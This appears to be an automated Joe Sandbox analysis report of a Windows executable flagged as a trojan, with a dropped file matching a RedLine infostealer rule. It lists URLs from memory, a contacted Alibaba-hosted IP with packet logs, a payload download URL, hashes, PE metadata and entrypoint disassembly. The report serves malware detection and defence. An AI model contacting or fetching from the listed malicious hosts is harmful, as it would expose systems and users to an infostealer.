            http://www.adicon.com.cn/SetSampleDownFlagByCustomerBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/DeleteGPGFileTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/addInspectReqNoXmlTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/getPatResultTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://com.wondersgroup.jkda.application.modules.webserviceTBaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadReportByPersonIDTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchByteSampleAiTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ReportDetailTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadBarCodeCancelTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownLoadReportFormPDFByAccountPassWordTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadReportByBarcodeNoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownLoadReportForm_PKITBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetBLTCTPicTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetJSONReportItemListByAdiconBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/UpLoadReportFromBytesTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppTrackDownTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/$BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportDetailByXmlDocumentTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/UpdatesSetDownTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppUpLoadDeleteTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownLoadReportFormIDTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetByteReportByYYtmTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            47.104.173.216
            unknownChina
            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1448043
            Start date and time:2024-05-27 15:22:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:17
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:BaGkRDSifo.exe
            renamed because original name is a hash value
            Original Sample Name:3b8f605388479cd9296e0be1ea9d1f60.exe
            Detection:MAL
            Classification:mal80.troj.evad.winEXE@1/2@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 90
            • Number of non-executed functions: 46
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            TimeTypeDescription
            09:23:01API Interceptor2834698x Sleep call for process: BaGkRDSifo.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            47.104.173.216msjYmnMpqK.exeGet hashmaliciousUnknownBrowse
            • 47.104.173.216:8081/STHealthUpdate.exe
            msjYmnMpqK.exeGet hashmaliciousUnknownBrowse
            • 47.104.173.216:8081/STHealthUpdate.exe
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdnzKl7TpAyk.elfGet hashmaliciousUnknownBrowse
            • 121.41.250.192
            hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
            • 223.7.75.82
            Mt5VyD087r.elfGet hashmaliciousMiraiBrowse
            • 47.99.61.19
            om4SVF6n0I.elfGet hashmaliciousMiraiBrowse
            • 47.100.90.123
            o77HTF1NHp.elfGet hashmaliciousUnknownBrowse
            • 47.114.199.46
            M4huqujaBY.elfGet hashmaliciousUnknownBrowse
            • 47.97.125.101
            3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
            • 182.94.124.102
            1Tkf1dTh5K.dllGet hashmaliciousUnknownBrowse
            • 47.110.247.171
            uCLkYbZQoA.exeGet hashmaliciousUnknownBrowse
            • 47.110.247.171
            1Tkf1dTh5K.dllGet hashmaliciousUnknownBrowse
            • 47.110.247.171
            No context
            No context
            Process:C:\Users\user\Desktop\BaGkRDSifo.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:modified
            Size (bytes):243200
            Entropy (8bit):7.305392631454974
            Encrypted:false
            SSDEEP:6144:GDKW1Lgbdl0TBBvjc/n9dNAC6dM3KoUG808Z:gh1Lk70TnvjcTmC6sdR80K
            MD5:341A6645505C8EAF54EC83738067D0C8
            SHA1:EE06B6C55D3671090BCF1F5D711D3FA3AADC98CB
            SHA-256:229C201DE7A746E65ACB6552198ABA51FA153619CB4F29DE0AF15CB3F2E1F7D0
            SHA-512:75748565211164F0681EF42C68B2EF1B0B1BE27C39D084676AD9C8036EC8532919D318088FCEDCF501308E807E874AC62593C654E44F5131AF0892B368F6DE43
            Malicious:true
            Yara Hits:
            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\Desktop\STHealthUpdate.exe, Author: ditekSHen
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................iTf....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\BaGkRDSifo.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):12
            Entropy (8bit):2.584962500721156
            Encrypted:false
            SSDEEP:3:MjQ:MjQ
            MD5:67D2CD3C90B556213462666F92C17F06
            SHA1:160B61EF0BBB7D022DEC1CEB02D3DC10044A94B9
            SHA-256:400E4A5E0E1D32437451BA59B4EF46DDC19B8C49B85B73C7B1EFC60D7E193C02
            SHA-512:35A4A04900178B1918DBA122A47F0755DE26FEDA9C027EA5D7946A43E91A9CBFB8CF031E4F6C79B76EB57A323E41223C892DCC104CD1EB1683950A7A4DEDFC5A
            Malicious:false
            Reputation:low
            Preview:3.24.05.27.5
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.992117526237163
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:BaGkRDSifo.exe
            File size:3'972'096 bytes
            MD5:3b8f605388479cd9296e0be1ea9d1f60
            SHA1:4608fd9d55cae50eaa9379b02373afea15572eae
            SHA256:d550397a71e1fc77be3460d1742f1df63d43ba74487a10ec96befc1c768768bc
            SHA512:46e4a7f6add48902ead4287ce2cadceb420fcb40265563036d29a327653c238607e8780955e7f4b06e4ab7e51ed8a752e7ad9fa1447f3774f217106770d68773
            SSDEEP:98304:waTZTvvywkGs93MqS8sbyTrtUQ4UYHGVvIx0qq85sXoz:w6bvyTGsJhsbwGUcGVWsXE
            TLSH:72063344B195C733D4B94E3080C5DFAD86A935720BEE605FA4F4326AAD219D3B278BC7
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................iTf....PE..L...t..P..........#........
            Icon Hash:072919949c39230f
            Entrypoint:0x40cd2f
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:0
            File Version Major:5
            File Version Minor:0
            Subsystem Version Major:5
            Subsystem Version Minor:0
            Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8
            Instruction
            call 00007F353CBDB606h
            jmp 00007F353CBD57C9h
            mov edi, edi
            push ebp
            mov ebp, esp
            sub esp, 20h
            mov eax, dword ptr [ebp+08h]
            push esi
            push edi
            push 00000008h
            pop ecx
            mov esi, 0041F058h
            lea edi, dword ptr [ebp-20h]
            rep movsd
            mov dword ptr [ebp-08h], eax
            mov eax, dword ptr [ebp+0Ch]
            pop edi
            mov dword ptr [ebp-04h], eax
            pop esi
            test eax, eax
            je 00007F353CBD592Eh
            test byte ptr [eax], 00000008h
            je 00007F353CBD5929h
            mov dword ptr [ebp-0Ch], 01994000h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            push dword ptr [ebp-10h]
            push dword ptr [ebp-1Ch]
            push dword ptr [ebp-20h]
            call dword ptr [0041B000h]
            leave
            retn 0008h
            ret
            mov eax, 00413563h
            mov dword ptr [004228E4h], eax
            mov dword ptr [004228E8h], 00412C4Ah
            mov dword ptr [004228ECh], 00412BFEh
            mov dword ptr [004228F0h], 00412C37h
            mov dword ptr [004228F4h], 00412BA0h
            mov dword ptr [004228F8h], eax
            mov dword ptr [004228FCh], 004134DBh
            mov dword ptr [00422900h], 00412BBCh
            mov dword ptr [00422904h], 00412B1Eh
            mov dword ptr [00422908h], 00412AABh
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F353CBD58BBh
            call 00007F353CBDC140h
            cmp dword ptr [ebp+00h], 00000000h
            Programming Language:
            • [ASM] VS2008 build 21022
            • [IMP] VS2005 build 50727
            • [C++] VS2008 build 21022
            • [ C ] VS2008 build 21022
            • [LNK] VS2008 build 21022
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x215b40x50.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x3a7a9c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x1b1c00x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20da00x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x184.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x197180x1980067bb7b7ee02b8ad3cdac5501a71675e2False0.5789675245098039data6.7485790680728055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x1b0000x6db40x6e005826801f33fc1b607aa8e942aa92e9faFalse0.5467329545454546data6.442956247632331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x220000x30c00x16002fe51a72ede820cd7cf55a77ba59b1f4False0.3126775568181818data3.2625868398009703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x260000x3a7a9c0x3a7c00887fed7706466c31f6d553bf3a6de6e3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x261b40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5906 x 5906 px/m0.5351913084553613
            RT_RCDATA0x2a3dc0x3a3151data1.0003108978271484
            RT_RCDATA0x3cd5300x20data1.34375
            RT_GROUP_ICON0x3cd5500x14data1.1
            RT_VERSION0x3cd5640x34cdata0.41113744075829384
            RT_MANIFEST0x3cd8b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
            DLLImport
            KERNEL32.dllRaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
            ole32.dllOleInitialize
            OLEAUT32.dllSafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString
            TimestampSource PortDest PortSource IPDest IP
            May 27, 2024 15:23:00.627278090 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:00.632333040 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:00.632467031 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:00.637504101 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:00.642450094 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.572685003 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.625286102 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:01.644777060 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:01.650099993 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.973798037 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.973845959 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.973882914 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:01.973946095 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.015887022 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.221919060 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.221986055 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.222026110 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.222049952 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.222059965 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.222098112 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.222157001 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.428642035 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428690910 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428747892 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.428767920 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428805113 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428838968 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428874016 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428888083 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.428909063 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.428921938 CEST497019876192.168.2.747.104.173.216
